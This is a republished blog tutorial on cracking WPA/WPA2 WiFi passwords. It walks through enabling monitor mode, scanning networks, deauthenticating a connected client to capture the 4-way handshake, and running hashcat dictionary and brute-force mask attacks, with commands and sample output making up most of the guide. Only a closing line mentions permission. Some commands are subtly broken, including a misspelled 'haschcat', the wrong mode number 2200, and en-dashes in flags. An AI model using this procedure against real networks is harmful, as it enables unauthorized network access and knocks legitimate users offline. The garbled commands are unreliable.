2023-10-3 03:31:22 Author: infosecwriteups.com(查看原文) 阅读量:16 收藏
In this guide, you will learn how to crack WiFi passwords using Hashcat. Hashcat is a powerful password recovery tool that can help you recover lost or forgotten passwords for a variety of platforms, including Windows, Linux, and macOS.
Hashcat is also one of the few tools that can work with the GPU and offers many ways of finding passwords from hashes.
The simplest way to crack a hash is to try first to guess the password. Dictionary and brute-force attacks are the most common ways of guessing passwords.
These techniques make use of a file that contains words, phrases, common passwords, and other strings that are likely to be used as a password.
Enable Monitor Mode
First, you need to put your wireless card in monitor mode using the following command.
airmon-ng start wlan0I will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs. You can use “iwconfig” command to find the wireless interface name.
Find Your Target
Start scanning nearby wireless routers with the following command.
airodump-ng wlan0CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:01:35:39:87 -42 17 0 0 11 54e WPA2 CCMP PSK Orange-Net
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
This displays a data table for all Wi-Fi routers in range.
For the purposes of this demo, I will choose to crack the password of my network, “SkyNet”.
Next, I need the access point MAC address (BSSID) and channel from the network. Let’s open another terminal and type:
airodump-ng --bssid 28:EF:01:35:34:85 -c 6 --write wpa-01 wlan0— write wpa-01 is the file name where you write the data, and where the 4-way handshake will be stored.
You can use the “ls” command to see the file, which later on you need to convert to a different format in order to crack the password.
Capture a WPA/WPA2 Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. In order to capture the 4-way authentication handshake, you need to have the client authenticate to the AP.
If they’re already authenticated, you can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby you can grab the 4-way handshake in the process. Open another terminal and type:
aireplay-ng -0 100 -a 28:EF:01:35:34:85 -c 28:EF:01:23:46:68 wlan0-0 means deauthentication.
100 is the number of deauths packets.
-a 28:EF:01:35:34:85 is the MAC address of the access point.
-c 28:EF:01:23:46:68 is the MAC address of the client you are deauthing.
CH 6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet
BSSID STATION PWR Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
In the screen above, notice the “WPA handshake: 28:EF:01:35:34:85” in the top right-hand corner. This means airodump-ng has successfully captured the handshake.
Convert the .cap file to .hccap format
Before you crack the password, you need to convert the .cap file (wpa-01.cap) to the hashcat file format .hc22000. This can be done very quickly by uploading the .cap file to https://hashcat.net/cap2hashcat and converting it to .hc22000 format.
Cracking WPA/WPA2 handshake
Hashcat is very flexible, so I’ll cover two most common attacks:
- Dictionary attack
- Brute-force attack
Dictionary attack
In addition to hashcat, you will also need a wordlist. A word list is a list of commonly used passwords in a big text file.
A popular password wordlist is rockyou.txt. It contains a list of commonly used passwords and is popular among pen testers. You can find the rockyou wordlist under /usr/share/wordlists in Kali Linux.
Now use the following command to start the cracking process:
hashcat –m 22000 wpa-01.hc22000 rockyou.txtIn this command, I am starting hashcat in 22000 mode, which is for attacking WPA network protocols. Next, specify the name of the file you want to crack, in my case is “wpa-01.hc22000”, and lastly “rockyou.txt” is the wordlist file.
The password was successfully cracked and is “justletmein”.
Brute-Force Attack
The brute force attack is based on trying out every possible combination, which leads to an immense number of possible combinations as the password length increases. To start the attack, use the following command:
haschcat –m 2200 –a 3 wpa-01.hc22000 ?l ?l ?l ?l ?l ?l ?l ?l ?l ?l-a 3 means you are using Brute Force Attack mode.
wpa-01.hc22000 = is the converted .cap file.
?l ?l ?l ?l ?l ?l ?l ?l ?l ?l = This is your mask where l = lowercase letters. This means the password is all in lowercase letters.
Hashcat allows you to use the following built-in charsets to attack a WPA /WPA2 handshake file.
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~So let's say your password is 87654321. You can use a custom mask like ?d?d?d?d?d?d?d?d
This means you’re trying to break an 8-digit number password like 87654323 or 43446789…
Here you can see the password is “justletmein” So, I’m using the lowercase letters mask (?l = abcdefghijklmnopqrstuvwxyz) to crack the password.
Conclusion
In this guide, you have learned how to crack WPA2 passwords using tools like Hashcat. This kind of activity should only be performed in a controlled environment where permission is given.
I hope you enjoyed this comprehensive tutorial. If you have any questions, feel free to leave a comment.
Thank you!
如有侵权请联系:admin#unsafe.sh